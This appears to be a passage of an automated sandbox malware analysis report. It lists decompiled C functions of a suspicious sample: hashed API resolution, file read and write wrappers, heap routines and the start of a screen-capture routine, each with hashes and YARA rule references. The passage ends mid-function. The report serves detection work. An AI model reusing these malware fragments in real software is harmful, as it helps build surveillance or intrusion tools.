                                                                                                                                                            • Instruction ID: 3df0b686ac559f6086e9d7f0a277d79260a1a218dc9337921a14e23ef3afa5fb
                                                                                                                                                            • Opcode Fuzzy Hash: 91aef9fdae6fba0f302109388241b55c85836ef7ee104aa29711c72b413082c3
                                                                                                                                                            • Instruction Fuzzy Hash: 18D05B59D4434C3BE620FAE45C07F5D735C8B40740F414195BE15E91C1FDA2962487E3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C6F56, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6F56() {
				char _v8;
				char _v20;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x5d9, 0xd, 0xc,  &_v20);
				_v8 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v20); // executed
				return _t8;
			}






                                                                                                                                                            0x009c6f6e
                                                                                                                                                            0x009c6f76
                                                                                                                                                            0x009c6f83
                                                                                                                                                            0x009c6f89
                                                                                                                                                            0x009c6f8e

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: ab9a3dcbb88c27f380878af7a4637cce69103455012d33fb284e18c53fa297d4
                                                                                                                                                            • Instruction ID: 083319bfef4d870bbb10028c40d8acb26e6df7bffe0061f719428075efde4cb8
                                                                                                                                                            • Opcode Fuzzy Hash: ab9a3dcbb88c27f380878af7a4637cce69103455012d33fb284e18c53fa297d4
                                                                                                                                                            • Instruction Fuzzy Hash: B4D012559442487AE720F6E45C07F7E775C9B50700F44059ABA15A61C2E9A1961487F3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C73BB, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C73BB(intOrPtr _a4, void* _a8, long _a12) {
				void* _t8;
				intOrPtr _t12;

				_t12 = _a4;
				_t8 = CreateIoCompletionPort(_a8,  *(_t12 + 4), _a12, 0); // executed
				return 0 |  *(_t12 + 4) == _t8;
			}





                                                                                                                                                            0x009c73bf
                                                                                                                                                            0x009c73cd
                                                                                                                                                            0x009c73df

                                                                                                                                                            APIs
                                                                                                                                                            • CreateIoCompletionPort.KERNEL32(?,?,009C38EE,00000000,00000000,?,009C38EE,?,?,00000000), ref: 009C73CD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CompletionCreatePort
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 499945625-0
                                                                                                                                                            • Opcode ID: 48194052c4d47a2c459dd4061c5e4d8a0840fe1856872d1ed2a0aea19112aa24
                                                                                                                                                            • Instruction ID: 7e17e376f2aff786ba6c7ea0c2e072c02be2e52ec8f9e73ae43d5dd24bc0dd80
                                                                                                                                                            • Opcode Fuzzy Hash: 48194052c4d47a2c459dd4061c5e4d8a0840fe1856872d1ed2a0aea19112aa24
                                                                                                                                                            • Instruction Fuzzy Hash: 56D0A733104318BFCF005F94ED01AD63BA8EF08A20F00802AF61987050D232F850DB84
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C7845, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7845(WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t6;

				_t6 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
				_t7 =  ==  ? 0 : _t6;
				return  ==  ? 0 : _t6;
			}




                                                                                                                                                            0x009c785b
                                                                                                                                                            0x009c7866
                                                                                                                                                            0x009c786a

                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,009C417E,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009C785B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: fddd1de4a37931f2d452eda747f2b2bcba2e3eea25c242b6b60f9725786dcd4b
                                                                                                                                                            • Instruction ID: b03ecc2261e2f701b13c0d488d09c3dc8eac58d74160af9f278e0d5b5ea3d86b
                                                                                                                                                            • Opcode Fuzzy Hash: fddd1de4a37931f2d452eda747f2b2bcba2e3eea25c242b6b60f9725786dcd4b
                                                                                                                                                            • Instruction Fuzzy Hash: BDD0923214424DBFDF161FA0DC06B9A3F66AF08760F504619FA29980E0D672E4B0AB88
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C474E, Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C474E(void* _a4, intOrPtr _a8) {
				intOrPtr _t3;
				void* _t5;

				_t3 = _a8;
				if(_t3 != 0) {
					_t5 = RtlAllocateHeap(_a4, 8, _t3 + _t3); // executed
					return _t5;
				} else {
					return _t3;
				}
			}





                                                                                                                                                            0x009c4751
                                                                                                                                                            0x009c4756
                                                                                                                                                            0x009c4762
                                                                                                                                                            0x009c4769
                                                                                                                                                            0x009c4759
                                                                                                                                                            0x009c4759
                                                                                                                                                            0x009c4759

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(009C1C60,00000008,?), ref: 009C4762
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 7556c83f0baf4a6ddd406f2c8951101dc42ffce365b2d7ef2da61ffb13dd5bed
                                                                                                                                                            • Instruction ID: 5d9b1e7c02ba809420140b3a465b3d40888fb87b4b546ffc49a8b52f0092bc06
                                                                                                                                                            • Opcode Fuzzy Hash: 7556c83f0baf4a6ddd406f2c8951101dc42ffce365b2d7ef2da61ffb13dd5bed
                                                                                                                                                            • Instruction Fuzzy Hash: EFC01232384208ABEF100E66EC02BB9379CAB00A15F008021FD0CCA610E721E8504640
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5262, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,009C1A54,00000000,00000000,?,00000000,?), ref: 009C526C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                            • Opcode ID: c90d1957a7b5a3c46555ecca2ec71d87365f7f4cb310537108b8c0866ef505b0
                                                                                                                                                            • Instruction ID: 66d13eaea4c5b03fc1246f21bb96ee4602e563bf1c53f294918db93f7f41594f
                                                                                                                                                            • Opcode Fuzzy Hash: c90d1957a7b5a3c46555ecca2ec71d87365f7f4cb310537108b8c0866ef505b0
                                                                                                                                                            • Instruction Fuzzy Hash: 27C0122681920C9ACB00FBF09A09489B7FC960C200B400591D805A2040F6659A9482A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C7600, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7600(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
				int _t6;

				_t6 = WriteFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
				return _t6;
			}




                                                                                                                                                            0x009c7612
                                                                                                                                                            0x009c7619

                                                                                                                                                            APIs
                                                                                                                                                            • WriteFile.KERNEL32(?,?,009C3673,00000000,?,?,009C3713,?,?,?,?,?), ref: 009C7612
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                            • Opcode ID: ee4317ac24642f67cf6b5b44f07f0de6b08d59eba043ee9c85b574765dd9a4ee
                                                                                                                                                            • Instruction ID: 98f5fdfbd451d0fc43e90ed507895a4c79f369701c9ab6d280d4b70dad6b6d02
                                                                                                                                                            • Opcode Fuzzy Hash: ee4317ac24642f67cf6b5b44f07f0de6b08d59eba043ee9c85b574765dd9a4ee
                                                                                                                                                            • Instruction Fuzzy Hash: 68C00236154248BFDF015F85EC05EAA3B69EB08611F404051FA184A161C772E9A0AB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C75CC, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C75CC(struct _OVERLAPPED* _a4, void* _a8, long _a12) {
				int _t6;

				_t6 = ReadFile( *(_a4 + 0x14), _a8, _a12, 0, _a4); // executed
				return _t6;
			}




                                                                                                                                                            0x009c75de
                                                                                                                                                            0x009c75e5

                                                                                                                                                            APIs
                                                                                                                                                            • ReadFile.KERNEL32(?,?,009C367E,00000000,?,?,009C329C,?,?), ref: 009C75DE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                            • Opcode ID: 620e719d83faccfe4f8752869969fa87ba8465c4b7b415bd697c15b334562f68
                                                                                                                                                            • Instruction ID: 34e6c269df6690e9e461dd966040df21c2a296dd8f1fd16d34a1ff439e712ae7
                                                                                                                                                            • Opcode Fuzzy Hash: 620e719d83faccfe4f8752869969fa87ba8465c4b7b415bd697c15b334562f68
                                                                                                                                                            • Instruction Fuzzy Hash: 0DC00236154208BFDF115F88EC05FAA3F69EB48611F104451BA184A1A1C672E960AB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C476A, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C476A(void _a4) {
				void* _t5;

				_t4 =  !=  ? _a4 : 0x400000;
				_t5 = HeapCreate(0,  !=  ? _a4 : 0x400000, 0); // executed
				return _t5;
			}




                                                                                                                                                            0x009c4778
                                                                                                                                                            0x009c477f
                                                                                                                                                            0x009c4786

                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,?,009C749B,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C477F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                                            • Opcode ID: 3f46c0b354607a6a305ef785ec091577c759345b9462cf1df13b57d2f6c5c0ad
                                                                                                                                                            • Instruction ID: 828ada6264cd76190fee33a124a14cd8fb2f281909a8efdf58c81d492881cb11
                                                                                                                                                            • Opcode Fuzzy Hash: 3f46c0b354607a6a305ef785ec091577c759345b9462cf1df13b57d2f6c5c0ad
                                                                                                                                                            • Instruction Fuzzy Hash: 97C08C31288208FBEB008A80EC05BA537DCEB00786F008021FB1C890C0C3B1A8808A98
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C789D, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C789D(void* _a4, void* _a8, long _a12, DWORD* _a16) {
				int _t5;

				_t5 = WriteFile(_a4, _a8, _a12, _a16, 0); // executed
				return _t5;
			}




                                                                                                                                                            0x009c78ae
                                                                                                                                                            0x009c78b5

                                                                                                                                                            APIs
                                                                                                                                                            • WriteFile.KERNEL32(00000FE6,00000000,009C41A9,?,00000000,?,009C41A9,00000000,00000FE6,?), ref: 009C78AE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                            • Opcode ID: e3bc6b0ed96c450624703ab0d611676ddde68c47f50079f1f6672b97d548948f
                                                                                                                                                            • Instruction ID: 8bf155798268ff3a095faae75ff3c5dfd244e56ef117f3f4d82c7e9de0989565
                                                                                                                                                            • Opcode Fuzzy Hash: e3bc6b0ed96c450624703ab0d611676ddde68c47f50079f1f6672b97d548948f
                                                                                                                                                            • Instruction Fuzzy Hash: 28C0023214424DBBDF025F81EC05A993F2AEB08661F404011FA1814060877295B0AB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4795, Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4795(void* _a4, void* _a8) {
				signed char _t3;

				_t3 = RtlFreeHeap(_a4, 0, _a8); // executed
				return _t3 & 0x000000ff;
			}




                                                                                                                                                            0x009c47a0
                                                                                                                                                            0x009c47aa

                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C47A0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: 08de19fcdf0299f1286d30835e253e6109ff964d34fe3be37f3182480da0c0d7
                                                                                                                                                            • Instruction ID: 99a528a36b066f81fa4b39a007da746a0ed3e0ece2dad59f09cacf73dfbc1910
                                                                                                                                                            • Opcode Fuzzy Hash: 08de19fcdf0299f1286d30835e253e6109ff964d34fe3be37f3182480da0c0d7
                                                                                                                                                            • Instruction Fuzzy Hash: 00C0923608421CBBCF112F82EC06BA87F69AB01661F408052FE0C880A1C676E5E1BAA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C7373, Relevance: 1.5, APIs: 1, Instructions: 9libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7373(CHAR* _a4) {
				struct HINSTANCE__* _t3;

				E009C707D(0x5e69269d);
				_t3 = LoadLibraryA(_a4); // executed
				return _t3;
			}




                                                                                                                                                            0x009c737e
                                                                                                                                                            0x009c7384
                                                                                                                                                            0x009c7387

                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryA.KERNEL32(00000009,?,009C6FC2,?,009D12D0,0000007A,00000009,00000009,?,?,009C6DEC,?), ref: 009C7384
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 8794aa509947488578456c868ef8b5ac54a31479f9351ef5e311a817fb67a789
                                                                                                                                                            • Instruction ID: 1b75e6c6474c97ef542ea6c2b1df4dfe7ecec3bfc757dbfcbc63b149c12c968b
                                                                                                                                                            • Opcode Fuzzy Hash: 8794aa509947488578456c868ef8b5ac54a31479f9351ef5e311a817fb67a789
                                                                                                                                                            • Instruction Fuzzy Hash: DDB0123E00820C3789207FE1BC02D4C7B4CDD802A0B000015F51C48511CC33E1609ED2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4B21, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4B21(void* _a4) {
				void* _t3;
				int _t4;

				if(_a4 != 0) {
					_t4 = FindCloseChangeNotification(_a4); // executed
					return _t4;
				}
				return _t3;
			}





                                                                                                                                                            0x009c4b28
                                                                                                                                                            0x009c4b2d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4b2d
                                                                                                                                                            0x009c4b34

                                                                                                                                                            APIs
                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                            • Opcode ID: b42d200006f6cac578a7197f2c48fae65f91a8a3d1bbefa77327bcc6a4eb4b8a
                                                                                                                                                            • Instruction ID: 02e57a57c58b9f291dd242862e18f6d676dddb7ca88ec60c4a5227c5781961f7
                                                                                                                                                            • Opcode Fuzzy Hash: b42d200006f6cac578a7197f2c48fae65f91a8a3d1bbefa77327bcc6a4eb4b8a
                                                                                                                                                            • Instruction Fuzzy Hash: 8CB0923144660CFBCF011F45F808BA97BACAF04345F408026BA0C55471CB729AE0DA81
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 009C453E, Relevance: 31.7, APIs: 21, Instructions: 202windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E009C453E() {
				signed int _v8;
				int _v12;
				signed int _v16;
				struct HDC__* _v20;
				void* _v24;
				int _v28;
				struct HDC__* _v32;
				int _v36;
				void* _v40;
				struct tagRECT _v56;
				struct HDC__* _t56;
				int _t59;
				int _t60;
				int _t61;
				void* _t62;
				int _t67;
				void* _t68;
				struct HBRUSH__* _t73;
				signed int _t77;
				int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				struct HDC__* _t101;
				struct HDC__* _t102;
				signed int _t104;
				signed int _t111;
				signed int _t112;
				signed char _t114;
				int _t121;
				void* _t123;
				struct HDC__* _t128;
				int _t132;
				int _t133;
				void* _t134;

				_t56 = GetDC(0);
				_t101 = _t56;
				_v32 = _t101;
				if(_t101 != 0) {
					_t128 = CreateCompatibleDC(_t101);
					_v20 = _t128;
					if(_t128 == 0) {
						L17:
						return ReleaseDC(0, _t101);
					}
					_t59 = GetDeviceCaps(_t101, 8);
					_t121 = _t59;
					_t60 = 0xa;
					_v28 = _t121;
					_v16 = _t60;
					_t61 = GetDeviceCaps(_t101, _t60);
					_v8 = _t61;
					_t62 = CreateCompatibleBitmap(_t101, _t121, _t61);
					_v24 = _t62;
					if(_t62 == 0) {
						L16:
						DeleteDC(_t128);
						goto L17;
					}
					SelectObject(_t128, _t62);
					_t67 =  ~(MulDiv(0x12, GetDeviceCaps(_t101, 0x5a), 0x48));
					_v36 = _t67;
					_t68 = CreateFontW(_t67, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, 0);
					_v40 = _t68;
					if(_t68 == 0) {
						L15:
						DeleteObject(_v24);
						goto L16;
					}
